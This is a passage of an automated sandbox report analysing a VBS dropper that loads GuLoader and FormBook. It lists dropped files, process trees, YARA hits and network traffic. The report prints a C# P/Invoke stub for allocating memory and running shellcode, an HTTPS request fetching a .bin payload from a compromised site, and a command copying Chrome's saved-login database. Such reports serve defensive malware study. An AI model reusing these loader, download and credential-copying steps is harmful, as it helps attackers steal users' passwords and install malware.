                      MD5:E10418B4412050E3C76BEC0AF627A27D
                      SHA1:966147B4966A8944E51AD98E53D007055CDEB64A
                      SHA-256:5C6EA7E08504357E2F5AB5AB4DE9A5F85F4CE98D0AF8748563257407EEC831E2
                      SHA-512:B00730B4C5275809CD9E42AC4B6330ABF94CE9B27D83B4D21844ADB6E46DAABF1A126193D9BA26D925832F7F3A46FD7A039CDD52802AC239749B8647DC9B78BB
                      Malicious:false
                      Preview: .using System;..using System.Runtime.InteropServices;..public static class bidrags1..{..[DllImport("ntdll.dll")]public static extern int NtAllocateVirtualMemory(int bidrags6,ref Int32 Auxamylase,int Fejem,ref Int32 bidrags,int HOCKEYKAMP,int bidrags7);..[DllImport("kernel32.dll")]public static extern IntPtr CreateFileA(string Semiglut7,uint ATTESTE,int Etiket9,int bidrags0,int bellev,int Buldrr,int FOLKE);..[DllImport("kernel32.dll")]public static extern int ReadFile(int Fejem0,uint Fejem1,IntPtr Fejem2,ref Int32 Fejem3,int Fejem4);..[DllImport("user32.dll")]public static extern IntPtr CallWindowProcW(IntPtr Fejem5,int Fejem6,int Fejem7,int Fejem8,int Fejem9);..}
                      C:\Users\user\AppData\Local\Temp\ej2xf2fu\ej2xf2fu.cmdline
                      Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                      File Type:UTF-8 Unicode (with BOM) text, with very long lines, with no line terminators
                      Category:dropped
                      Size (bytes):375
                      Entropy (8bit):5.266071138526186
                      Encrypted:false
                      SSDEEP:6:pAu+H2LvkuqJDdqxLTKbDdqB/6K2N723f46pDJ0zxs7+AEszIN723f46p/Hn:p37Lvkmb6K2aQ6pD+WZETaQ6p/Hn
                      MD5:DE6C8A5F7F7F9DF51D896338DFC61245
                      SHA1:A2188907B5B842FB60DBC06CA4C2F95A66775939
                      SHA-256:28879EE84982963E2BAD391F1293B3430B4EDC12BDA9B67B079A9D40259D62DC
                      SHA-512:0D37EBA769FDCA3C33D9AAA7C287349C3E5EE6C37A0932D06D36962F6EF9A089C03232E8601326A9CDFBC1E17A14251152EC40DACE0C9240B31B0FFF3C204777
                      Malicious:false
                      Preview: ./t:library /utf8output /R:"System.dll" /R:"C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.dll" /R:"System.Core.dll" /out:"C:\Users\user\AppData\Local\Temp\ej2xf2fu\ej2xf2fu.dll" /debug- /optimize+ /warnaserror /optimize+ "C:\Users\user\AppData\Local\Temp\ej2xf2fu\ej2xf2fu.0.cs"
                      C:\Users\user\AppData\Local\Temp\ej2xf2fu\ej2xf2fu.dll
                      Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe
                      File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                      Category:dropped
                      Size (bytes):3584
                      Entropy (8bit):3.066019734916757
                      Encrypted:false
                      SSDEEP:48:6IPscOEfEBB7q6Fa9J3H1ulW1Na3J1Oq:JscTfEBBW7SI1NKJ1
                      MD5:90529F8DAAFC1245AB4A8F4013C324AB
                      SHA1:F8B2E16211C0412456005711C6F695316CC72BA3
                      SHA-256:A746A39365D1ACAF4963C06F76D7750AE000D50CEEAAA7767ABFB7FDFE31E8CE
                      SHA-512:72D85E7FD2108D643EE175E2DEE61D5A0044362C2D04AEBAA5B74AEBC5912C26F5E6C0C708C22A17279A0D9835BAC63F34C6C0F8467E9DCA030592775D2EB9FF
                      Malicious:false
                      Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......a...........!.................%... ...@....... ....................................@..................................$..O....@.......................`....................................................... ............... ..H............text...4.... ...................... ..`.rsrc........@......................@..@.reloc.......`......................@..B.................%......H.......P ..............................................................BSJB............v4.0.30319......l.......#~.. .......#Strings............#US.........#GUID... ...l...#Blob...........G.........%3............................................................0.)...G.'...m.'.......................................... 7............ O............ [.!.......... d.+.......t.....}.......................................................................................................
                      C:\Users\user\AppData\Local\Temp\ej2xf2fu\ej2xf2fu.out
                      Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                      File Type:UTF-8 Unicode (with BOM) text, with very long lines, with CRLF, CR line terminators
                      Category:modified
                      Size (bytes):876
                      Entropy (8bit):5.325217571265001
                      Encrypted:false
                      SSDEEP:24:KOuqd3ka6K2aF/ETalOKaM5DqBVKVrdFAMBJTH:yika6CF/E+YKxDcVKdBJj
                      MD5:AA96DEDB7C61FFB3A4CA817F5E72B514
                      SHA1:760EF1A4CB3714381A03AB5DF9BA449C1292FF40
                      SHA-256:9821620E1530BB8B01E4A52A526BD11BB5C29CCB94CD72DBBFE31F4E6A26B992
                      SHA-512:B5BF3C34EAF5AECC36C56F89C4B88AE0EB8F5FFC2AD8941E99E769FA631F64919A6A25F9DAD2629CCFDBAD5AF5E79CAE784FBB9B4570A08968EE058047AFAB30
                      Malicious:false
                      Preview: .C:\Users\user\Desktop> "C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /t:library /utf8output /R:"System.dll" /R:"C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.dll" /R:"System.Core.dll" /out:"C:\Users\user\AppData\Local\Temp\ej2xf2fu\ej2xf2fu.dll" /debug- /optimize+ /warnaserror /optimize+ "C:\Users\user\AppData\Local\Temp\ej2xf2fu\ej2xf2fu.0.cs"......Microsoft (R) Visual C# Compiler version 4.7.3056.0...for C# 5..Copyright (C) Microsoft Corporation. All rights reserved.......This compiler is provided as part of the Microsoft (R) .NET Framework, but only supports language versions up to C# 5, which is no longer the latest version. For compilers that support newer versions of the C# programming language, see http://go.microsoft.com/fwlink/?LinkID=533240....
                      C:\Users\user\AppData\Roaming\O118090C\O11logim.jpeg
                      Process:C:\Windows\SysWOW64\cmstp.exe
                      File Type:JPEG image data, JFIF standard 1.01, resolution (DPI), density 96x96, segment length 16, baseline, precision 8, 1280x1024, frames 3
                      Category:dropped
                      Size (bytes):90785
                      Entropy (8bit):7.907664631142863
                      Encrypted:false
                      SSDEEP:1536:CnYe+VSZbENKClcUMOEHhEGJNRTO13awF3vUV0dLKPCmHJ9Otpr7wK80q2t2hBgA:uYeiObAlc6kh1ru3VtvUV0oPZp8rf/Up
                      MD5:995FEFB0BA9BFD10B9558867469A86A8
                      SHA1:50DE613E9DF62B7EF869F3F1543FE109032A1664
                      SHA-256:DBE5D5D4A9D14B644AA2DBF237F2E2E011D97DD0D4CEB9D1A9D9431FBB03C97A
                      SHA-512:470278101AE7CC3F09FBD5F2D797063AFD1305BE7837601B3121DAAE786C1CBFA7AA9457294434EE876416AF4F4ABF5C88F44696B1C511145F2D6290261F84CD
                      Malicious:false
                      C:\Users\user\AppData\Roaming\O118090C\O11logrg.ini
                      Process:C:\Windows\SysWOW64\cmstp.exe
                      File Type:data
                      Category:dropped
                      Size (bytes):38
                      Entropy (8bit):2.7883088224543333
                      Encrypted:false
                      SSDEEP:3:rFGQJhIl:RGQPY
                      MD5:4AADF49FED30E4C9B3FE4A3DD6445EBE
                      SHA1:1E332822167C6F351B99615EADA2C30A538FF037
                      SHA-256:75034BEB7BDED9AEAB5748F4592B9E1419256CAEC474065D43E531EC5CC21C56
                      SHA-512:EB5B3908D5E7B43BA02165E092F05578F45F15A148B4C3769036AA542C23A0F7CD2BC2770CF4119A7E437DE3F681D9E398511F69F66824C516D9B451BB95F945
                      Malicious:false
                      Preview: ....C.h.r.o.m.e. .R.e.c.o.v.e.r.y.....
                      C:\Users\user\AppData\Roaming\O118090C\O11logri.ini
                      Process:C:\Windows\SysWOW64\cmstp.exe
                      File Type:data
                      Category:dropped
                      Size (bytes):40
                      Entropy (8bit):2.8420918598895937
                      Encrypted:false
                      SSDEEP:3:+slXllAGQJhIl:dlIGQPY
                      MD5:D63A82E5D81E02E399090AF26DB0B9CB
                      SHA1:91D0014C8F54743BBA141FD60C9D963F869D76C9
                      SHA-256:EAECE2EBA6310253249603033C744DD5914089B0BB26BDE6685EC9813611BAAE
                      SHA-512:38AFB05016D8F3C69D246321573997AAAC8A51C34E61749A02BF5E8B2B56B94D9544D65801511044E1495906A86DC2100F2E20FF4FCBED09E01904CC780FDBAD
                      Malicious:true
                      Preview: ....I.e.x.p.l.o.r. .R.e.c.o.v.e.r.y.....
                      C:\Users\user\AppData\Roaming\O118090C\O11logrv.ini
                      Process:C:\Windows\SysWOW64\cmstp.exe
                      File Type:data
                      Category:dropped
                      Size (bytes):210
                      Entropy (8bit):3.5313317928937202
                      Encrypted:false
                      SSDEEP:6:tGQPYlIaExGNlGcQga3Of9y96GO4olP5K3edr+dEoY:MlIaExGNYvOI6x4oTKOdoY
                      MD5:F00C2EC3AF2BBB73B7B349628B0F8C72
                      SHA1:04D99CF6BA41CF9279B16861D8E681374DE33533
                      SHA-256:619F292C50A38504BFB7B830B2F04A6D7ED8321E944B252F5EA09951E413A46C
                      SHA-512:4D12A0A9651CF302052B4A562EFF4629CBA47B83ECF942DBA2363C04543D05AADD3CC407A47E24FDC858D6D2695249C2CF72F2331B96463CA66F6250B798A2A5
                      Malicious:true
                      Preview: ...._._.V.a.u.l.t. .R.e.c.o.v.e.r.y.........N.a.m.e.:...M.i.c.r.o.s.o.f.t.A.c.c.o.u.n.t.:.t.a.r.g.e.t.=.S.S.O._.P.O.P._.D.e.v.i.c.e.....I.d.:...0.2.l.j.r.k.p.f.k.h.r.q.p.g.y.z.....A.u.t.:.......P.a.s.s.:.......
                      C:\Users\user\Documents\20220113\PowerShell_transcript.675052.bBuy1HxC.20220113145401.txt
                      Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                      File Type:UTF-8 Unicode (with BOM) text, with very long lines, with CRLF line terminators
                      Category:dropped
                      Size (bytes):10574
                      Entropy (8bit):5.1472776153012
                      Encrypted:false
                      SSDEEP:192:hXkDukQ0uUvJ7Yc9AxSGkxibhoat43oL2oLE/SG8jGLbntkZW/11IIWkPkPe:h0aTzk1YVAzcNoat43oL2oLE/SZGLbnr
                      MD5:AA795D00F66E74100D7E3AD5B7744C99
                      SHA1:F633DEE8F6CC827694CD3C4FDF3B9094B1D095CB
                      SHA-256:939EDD3A6D85E45D9985626B4D17A26CCAE7D629CA3E71CBE5BB14623BFAC057
                      SHA-512:B69198792DD0763300D0A9903914FE12A5092CC5B419D1A70B70DA6DFC3AAF31499754B6D91A19CA57741E41A8A242CFA0BB3D8BB2E59989DD5399F403F8A6C4
                      Malicious:false
                      Preview: .**********************..Windows PowerShell transcript start..Start time: 20220113145415..Username: computer\user..RunAs User: computer\user..Configuration Name: ..Machine: 675052 (Microsoft Windows NT 10.0.17134.0)..Host Application: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe -EncodedCommand

                      Static File Info

                      General

                      File type:ASCII text, with CRLF line terminators
                      Entropy (8bit):4.991680425662362
                      TrID:
                      • Visual Basic Script (13500/0) 100.00%
                      File name:MTIR22024323_0553381487_20220112120005.vbs
                      File size:78852
                      MD5:564601676bee71f5f61a44ef170d92a6
                      SHA1:76fca984dab2358e66524172e04a3528f33d8e18
                      SHA256:5e12314df61fd39cad151a41fb0d3188e437c591fa7498f09f103dea4a46f141
                      SHA512:a9b778cd8bb8684c9f7f7e0b9d79d17c2b0fab326fbfd59f818c7aaa403bf3fc67cf9944b2149b17e742feff9217c2a2ed3f18e15a8be82dbd4b709f5b86fe1d
                      SSDEEP:1536:c/Y+PmkHWIdXO4ZmzFbQit06zMPbrHo6T0EdXX0y:AF+lzGhdXr
                      File Content Preview:'ravishedm tunneldal totalforb quadrig Smri thri Ital FIBERWA UNBR Havsndensu6 Solmo BNSKR Blunt Spel1 Egromancyd SVEJS fyringsol ..'Eksal damb blaanendek Xoan Famineu Alde8 ENKELTM corusca realloca Basest9 Retteligr6 skgl blgvantefo labbend torpeder EKVI

                      File Icon

                      Icon Hash:e8d69ece869a9ec4

                      Network Behavior

                      Network Port Distribution

                      TCP Packets


                      UDP Packets

                      Timestamp | Source Port | Dest Port | Source IP | Dest IP
                      Jan 13, 2022 14:55:06.049655914 CET | 51774 | 53 | 192.168.2.6 | 8.8.8.8
                      Jan 13, 2022 14:55:06.066961050 CET | 53 | 51774 | 8.8.8.8 | 192.168.2.6
                      Jan 13, 2022 14:58:04.611366987 CET | 55299 | 53 | 192.168.2.6 | 8.8.8.8
                      Jan 13, 2022 14:58:04.792109966 CET | 53 | 55299 | 8.8.8.8 | 192.168.2.6

                      DNS Queries

                      Timestamp | Source IP | Dest IP | Trans ID | OP Code | Name | Type | Class
                      Jan 13, 2022 14:55:06.049655914 CET | 192.168.2.6 | 8.8.8.8 | 0xe41d | Standard query (0) | www.wizumiya.co.jp | A (IP address) | IN (0x0001)
                      Jan 13, 2022 14:58:04.611366987 CET | 192.168.2.6 | 8.8.8.8 | 0x5306 | Standard query (0) | www.jewelrystore1.com | A (IP address) | IN (0x0001)

                      DNS Answers

                      Timestamp | Source IP | Dest IP | Trans ID | Reply Code | Name | CName | Address | Type | Class
                      Jan 13, 2022 14:55:06.066961050 CET | 8.8.8.8 | 192.168.2.6 | 0xe41d | No error (0) | www.wizumiya.co.jp | | 52.68.15.223 | A (IP address) | IN (0x0001)
                      Jan 13, 2022 14:58:04.792109966 CET | 8.8.8.8 | 192.168.2.6 | 0x5306 | No error (0) | www.jewelrystore1.com | | 154.208.173.143 | A (IP address) | IN (0x0001)

                      HTTP Request Dependency Graph

                      • www.wizumiya.co.jp

                      HTTPS Proxied Packets

                      Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                      0 | 192.168.2.6 | 49775 | 52.68.15.223 | 443 | C:\Program Files (x86)\Internet Explorer\ieinstal.exe
                      Timestamp | kBytes transferred | Direction | Data
                      2022-01-13 13:55:07 UTC | 0 | OUT | GET /html/user_data/original/images/bin_WUOAiR166.bin HTTP/1.1
                      User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko
                      Host: www.wizumiya.co.jp
                      Cache-Control: no-cache
                      2022-01-13 13:55:07 UTC | 0 | IN | HTTP/1.1 200 OK
                      Date: Thu, 13 Jan 2022 13:55:07 GMT
                      Server: Apache/2.4.18 (Ubuntu)
                      Last-Modified: Wed, 12 Jan 2022 18:28:59 GMT
                      ETag: "2e640-5d566be50ccd5"
                      Accept-Ranges: bytes
                      Content-Length: 190016
                      Connection: close
                      Content-Type: application/octet-stream


                      System Behavior

                      General

                      Start time:14:53:50
                      Start date:13/01/2022
                      Path:C:\Windows\System32\wscript.exe
                      Wow64 process (32bit):false
                      Commandline:C:\Windows\System32\wscript.exe "C:\Users\user\Desktop\MTIR22024323_0553381487_20220112120005.vbs"
                      Imagebase:0x7ff61a070000
                      File size:163840 bytes
                      MD5 hash:9A68ADD12EB50DDE7586782C3EB9FF9C
                      Has elevated privileges:true
                      Has administrator privileges:true
                      Programmed in:C, C++ or other language
                      Reputation:high

                      General

                      Start time:14:53:58
                      Start date:13/01/2022
                      Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                      Wow64 process (32bit):true
                      Commandline:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand [Base64-encoded command]
                      Imagebase:0xd30000
                      File size:430592 bytes
                      MD5 hash:DBA3E6449E97D4E3DF64527EF7012A10
                      Has elevated privileges:true
                      Has administrator privileges:true
                      Programmed in:.Net C# or VB.NET
                      Reputation:high

                      General

                      Start time:14:53:58
                      Start date:13/01/2022
                      Path:C:\Windows\System32\conhost.exe
                      Wow64 process (32bit):false
                      Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                      Imagebase:0x7ff61de10000
                      File size:625664 bytes
                      MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                      Has elevated privileges:true
                      Has administrator privileges:true
                      Programmed in:C, C++ or other language
                      Reputation:high

                      General

                      Start time:14:54:29
                      Start date:13/01/2022
                      Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe
                      Wow64 process (32bit):true
                      Commandline:C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\ej2xf2fu\ej2xf2fu.cmdline
                      Imagebase:0x1140000
                      File size:2170976 bytes
                      MD5 hash:350C52F71BDED7B99668585C15D70EEA
                      Has elevated privileges:true
                      Has administrator privileges:true
                      Programmed in:.Net C# or VB.NET
                      Reputation:moderate

                      General

                      Start time:14:54:31
                      Start date:13/01/2022
                      Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe
                      Wow64 process (32bit):true
                      Commandline:C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RES5835.tmp" "c:\Users\user\AppData\Local\Temp\ej2xf2fu\CSC2BA07324D1EB47AD834E18C884AF81E4.TMP"
                      Imagebase:0x1040000
                      File size:43176 bytes
                      MD5 hash:C09985AE74F0882F208D75DE27770DFA
                      Has elevated privileges:true
                      Has administrator privileges:true
                      Programmed in:C, C++ or other language
                      Reputation:moderate

                      General

                      Start time:14:54:52
                      Start date:13/01/2022
                      Path:C:\Program Files (x86)\Internet Explorer\ieinstal.exe
                      Wow64 process (32bit):false
                      Commandline:C:\Program Files (x86)\internet explorer\ieinstal.exe
                      Imagebase:0x150000
                      File size:480256 bytes
                      MD5 hash:DAD17AB737E680C47C8A44CBB95EE67E
                      Has elevated privileges:true
                      Has administrator privileges:true
                      Programmed in:C, C++ or other language
                      Reputation:moderate

                      General

                      Start time:14:54:53
                      Start date:13/01/2022
                      Path:C:\Program Files (x86)\Internet Explorer\ieinstal.exe
                      Wow64 process (32bit):false
                      Commandline:C:\Program Files (x86)\internet explorer\ieinstal.exe
                      Imagebase:0x150000
                      File size:480256 bytes
                      MD5 hash:DAD17AB737E680C47C8A44CBB95EE67E
                      Has elevated privileges:true
                      Has administrator privileges:true
                      Programmed in:C, C++ or other language
                      Reputation:moderate

                      General

                      Start time:14:54:54
                      Start date:13/01/2022
                      Path:C:\Program Files (x86)\Internet Explorer\ieinstal.exe
                      Wow64 process (32bit):true
                      Commandline:C:\Program Files (x86)\internet explorer\ieinstal.exe
                      Imagebase:0x150000
                      File size:480256 bytes
                      MD5 hash:DAD17AB737E680C47C8A44CBB95EE67E
                      Has elevated privileges:true
                      Has administrator privileges:true
                      Programmed in:C, C++ or other language
                      Yara matches:
                      • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000012.00000002.602508277.0000000002C90000.00000040.00020000.sdmp, Author: Joe Security
                      • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000012.00000002.602508277.0000000002C90000.00000040.00020000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                      • Rule: Formbook, Description: detect Formbook in memory, Source: 00000012.00000002.602508277.0000000002C90000.00000040.00020000.sdmp, Author: JPCERT/CC Incident Response Group
                      • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000012.00000002.606173802.000000001E9A0000.00000040.00020000.sdmp, Author: Joe Security
                      • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000012.00000002.606173802.000000001E9A0000.00000040.00020000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                      • Rule: Formbook, Description: detect Formbook in memory, Source: 00000012.00000002.606173802.000000001E9A0000.00000040.00020000.sdmp, Author: JPCERT/CC Incident Response Group
                      • Rule: JoeSecurity_GuLoader_2, Description: Yara detected GuLoader, Source: 00000012.00000000.495265082.0000000002D00000.00000040.00000001.sdmp, Author: Joe Security
                      Reputation:moderate

                      General

                      Start time:14:55:09
                      Start date:13/01/2022
                      Path:C:\Windows\explorer.exe
                      Wow64 process (32bit):false
                      Commandline:C:\Windows\Explorer.EXE
                      Imagebase:0x7ff6f22f0000
                      File size:3933184 bytes
                      MD5 hash:AD5296B280E8F522A8A897C96BAB0E1D
                      Has elevated privileges:true
                      Has administrator privileges:true
                      Programmed in:C, C++ or other language
                      Yara matches:
                      • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000016.00000000.580329800.0000000006624000.00000040.00020000.sdmp, Author: Joe Security
                      • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000016.00000000.580329800.0000000006624000.00000040.00020000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                      • Rule: Formbook, Description: detect Formbook in memory, Source: 00000016.00000000.580329800.0000000006624000.00000040.00020000.sdmp, Author: JPCERT/CC Incident Response Group
                      • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000016.00000000.558838756.0000000006624000.00000040.00020000.sdmp, Author: Joe Security
                      • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000016.00000000.558838756.0000000006624000.00000040.00020000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                      • Rule: Formbook, Description: detect Formbook in memory, Source: 00000016.00000000.558838756.0000000006624000.00000040.00020000.sdmp, Author: JPCERT/CC Incident Response Group
                      Reputation:high

                      General

                      Start time:14:55:42
                      Start date:13/01/2022
                      Path:C:\Windows\SysWOW64\autochk.exe
                      Wow64 process (32bit):false
                      Commandline:C:\Windows\SysWOW64\autochk.exe
                      Imagebase:0xd60000
                      File size:871424 bytes
                      MD5 hash:34236DB574405291498BCD13D20C42EB
                      Has elevated privileges:true
                      Has administrator privileges:true
                      Programmed in:C, C++ or other language

                      General

                      Start time:14:55:43
                      Start date:13/01/2022
                      Path:C:\Windows\SysWOW64\cmstp.exe
                      Wow64 process (32bit):true
                      Commandline:C:\Windows\SysWOW64\cmstp.exe
                      Imagebase:0xeb0000
                      File size:82944 bytes
                      MD5 hash:4833E65ED211C7F118D4A11E6FB58A09
                      Has elevated privileges:true
                      Has administrator privileges:true
                      Programmed in:C, C++ or other language
                      Yara matches:
                      • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 0000001B.00000002.884036169.0000000000D40000.00000040.00020000.sdmp, Author: Joe Security
                      • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 0000001B.00000002.884036169.0000000000D40000.00000040.00020000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                      • Rule: Formbook, Description: detect Formbook in memory, Source: 0000001B.00000002.884036169.0000000000D40000.00000040.00020000.sdmp, Author: JPCERT/CC Incident Response Group
                      • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 0000001B.00000002.884961928.0000000000D70000.00000004.00000001.sdmp, Author: Joe Security
                      • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 0000001B.00000002.884961928.0000000000D70000.00000004.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                      • Rule: Formbook, Description: detect Formbook in memory, Source: 0000001B.00000002.884961928.0000000000D70000.00000004.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                      • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 0000001B.00000002.879710590.0000000000630000.00000040.00020000.sdmp, Author: Joe Security
                      • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 0000001B.00000002.879710590.0000000000630000.00000040.00020000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                      • Rule: Formbook, Description: detect Formbook in memory, Source: 0000001B.00000002.879710590.0000000000630000.00000040.00020000.sdmp, Author: JPCERT/CC Incident Response Group

                      General

                      Start time:14:55:55
                      Start date:13/01/2022
                      Path:C:\Windows\SysWOW64\cmd.exe
                      Wow64 process (32bit):true
                      Commandline:/c copy "C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data" "C:\Users\user\AppData\Local\Temp\DB1" /V
                      Imagebase:0x2a0000
                      File size:232960 bytes
                      MD5 hash:F3BDBE3BB6F734E357235F4D5898582D
                      Has elevated privileges:true
                      Has administrator privileges:true
                      Programmed in:C, C++ or other language

                      General

                      Start time:14:55:56
                      Start date:13/01/2022
                      Path:C:\Windows\System32\conhost.exe
                      Wow64 process (32bit):false
                      Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                      Imagebase:0x7ff61de10000
                      File size:625664 bytes
                      MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                      Has elevated privileges:true
                      Has administrator privileges:true
                      Programmed in:C, C++ or other language

                      General

                      Start time:14:55:58
                      Start date:13/01/2022
                      Path:C:\Program Files (x86)\Internet Explorer\ieinstal.exe
                      Wow64 process (32bit):true
                      Commandline:"C:\Program Files (x86)\internet explorer\ieinstal.exe"
                      Imagebase:0x150000
                      File size:480256 bytes
                      MD5 hash:DAD17AB737E680C47C8A44CBB95EE67E
                      Has elevated privileges:true
                      Has administrator privileges:true
                      Programmed in:C, C++ or other language

                      General

                      Start time:14:56:06
                      Start date:13/01/2022
                      Path:C:\Program Files (x86)\Internet Explorer\ieinstal.exe
                      Wow64 process (32bit):true
                      Commandline:"C:\Program Files (x86)\internet explorer\ieinstal.exe"
                      Imagebase:0x150000
                      File size:480256 bytes
                      MD5 hash:DAD17AB737E680C47C8A44CBB95EE67E
                      Has elevated privileges:true
                      Has administrator privileges:true
                      Programmed in:C, C++ or other language

                      General

                      Start time:14:56:16
                      Start date:13/01/2022
                      Path:C:\Windows\explorer.exe
                      Wow64 process (32bit):false
                      Commandline:"C:\Windows\explorer.exe" /LOADSAVEDWINDOWS
                      Imagebase:0x7ff6f22f0000
                      File size:3933184 bytes
                      MD5 hash:AD5296B280E8F522A8A897C96BAB0E1D
                      Has elevated privileges:true
                      Has administrator privileges:true
                      Programmed in:C, C++ or other language

                      General

                      Start time:14:57:18
                      Start date:13/01/2022
                      Path:C:\Windows\explorer.exe
                      Wow64 process (32bit):false
                      Commandline:"C:\Windows\explorer.exe" /LOADSAVEDWINDOWS
                      Imagebase:0x7ff6f22f0000
                      File size:3933184 bytes
                      MD5 hash:AD5296B280E8F522A8A897C96BAB0E1D
                      Has elevated privileges:true
                      Has administrator privileges:true
                      Programmed in:C, C++ or other language

                      Disassembly

                      Code Analysis


                        Execution Graph

                        Execution Coverage:6.6%
                        Dynamic/Decrypted Code Coverage:0%
                        Signature Coverage:0%
                        Total number of Nodes:36
                        Total number of Limit Nodes:3


                        Executed Functions

                        Memory Dump Source
                        • Source File: 00000004.00000002.562493421.0000000007610000.00000040.00000001.sdmp, Offset: 07610000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_4_2_7610000_powershell.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: 7f3b5c4bc06fceda45600b50387262f78ff7f4ee6f4970b161bd936931265860
                        • Instruction ID: c686319a3526a8c81db496c8f0175b4f5479624e3705414b66426c82c302db86
                        • Opcode Fuzzy Hash: 7f3b5c4bc06fceda45600b50387262f78ff7f4ee6f4970b161bd936931265860
                        • Instruction Fuzzy Hash: 26524BB060021ACFDB15DF74C854BAA73B2FF89314F1585A9E90AAB360DB35DD41CBA1
                        Uniqueness

                        Uniqueness Score: -1.00%

                        Memory Dump Source
                        • Source File: 00000004.00000002.551378345.0000000000D10000.00000040.00000001.sdmp, Offset: 00D10000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_4_2_d10000_powershell.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: ac67bba5913e3f49dd4547b46a85b23fe7a1d433a7ea6d8fcf1ec104c615a1a3
                        • Instruction ID: 2df60e61daffc346a3fd971a08f26c524ec2dc2394ff8b346d885b3335704c8d
                        • Opcode Fuzzy Hash: ac67bba5913e3f49dd4547b46a85b23fe7a1d433a7ea6d8fcf1ec104c615a1a3
                        • Instruction Fuzzy Hash: 11A18B70600605AFE719DF24D4947AE7BE3BF88304F148569E5029B3A5CF74DD85CBA1
                        Uniqueness

                        Uniqueness Score: -1.00%

                        Control-flow Graph

                        • Executed
                        • Not Executed
                        control_flow_graph 18 761f748-761f77b call 761edc4 22 761f7a6-761f83c 18->22 23 761f77d-761f7a5 18->23 32 761f844-761f87f CreateFileW 22->32 33 761f83e-761f841 22->33 34 761f881-761f887 32->34 35 761f888-761f8a5 32->35 33->32 34->35
                        Memory Dump Source
                        • Source File: 00000004.00000002.562493421.0000000007610000.00000040.00000001.sdmp, Offset: 07610000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_4_2_7610000_powershell.jbxd
                        Similarity
                        • API ID: CreateFile
                        • String ID:
                        • API String ID: 823142352-0
                        • Opcode ID: 7f1ff246f535adda64f277e08df0e048cc5f6a9d98d16c734a92e9650bdaf889
                        • Instruction ID: e6bf3082b5cf81611ae939bcad5c20d75d38a3fb4f41d540c29932f4d053f238
                        • Opcode Fuzzy Hash: 7f1ff246f535adda64f277e08df0e048cc5f6a9d98d16c734a92e9650bdaf889
                        • Instruction Fuzzy Hash: 694192B1A042199FDB00DFA8D844BDEFFB9FB48314F14816AE909AB381D7759944CBE1
                        Uniqueness

                        Uniqueness Score: -1.00%

                        Control-flow Graph

                        control_flow_graph 38 761ed31-761ed33 39 761ed35-761ed80 38->39 40 761ed9c-761edab 38->40 42 761ee14-761ee1a 40->42 43 761edad-761f83c 40->43 48 761f844-761f87f CreateFileW 43->48 49 761f83e-761f841 43->49 50 761f881-761f887 48->50 51 761f888-761f8a5 48->51 49->48 50->51
                        APIs
                        • CreateFileW.KERNELBASE(00000000,C0000000,?,?,?,?,?,?,?,?,0761F767,00000000,00000000,00000003,00000000,00000002), ref: 0761F872
                        Memory Dump Source
